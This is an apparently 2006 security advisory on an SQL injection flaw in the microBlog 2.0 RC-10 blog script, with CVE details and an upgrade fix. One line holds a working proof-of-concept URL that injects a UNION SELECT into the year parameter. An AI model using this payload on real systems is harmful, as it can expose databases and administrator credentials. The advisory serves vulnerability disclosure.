SQL Injection Vulnerability in microBlog

Summary

Vulnerability
SQL Injection Vulnerability in microBlog
Discovered
2006.01.16
Last Update
2006.02.22 Solution added
ID
EV0035
CVE
CVE-2006-0234
Risk Level
medium
Type
SQL Injection
Status
Patched
Vendor
n/a
Vulnerable Software
microBlog (http://www.stamcar.com/projekti/microblog/)
Version
2.0 RC-10
PoC/Exploit
Available
Solution
Available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in microBlog (http://www.stamcar.com/projekti/microblog/) script.

Vulnerable script: index.php

Variables $month $year isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Administrator's login and password is threatened.

PoC/Exploit

SQL Injection Example:

http://host/microblog/index.php?month=1&year=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*

Solution.

Install or upgrade to new 2.1 version to fix this vulnerability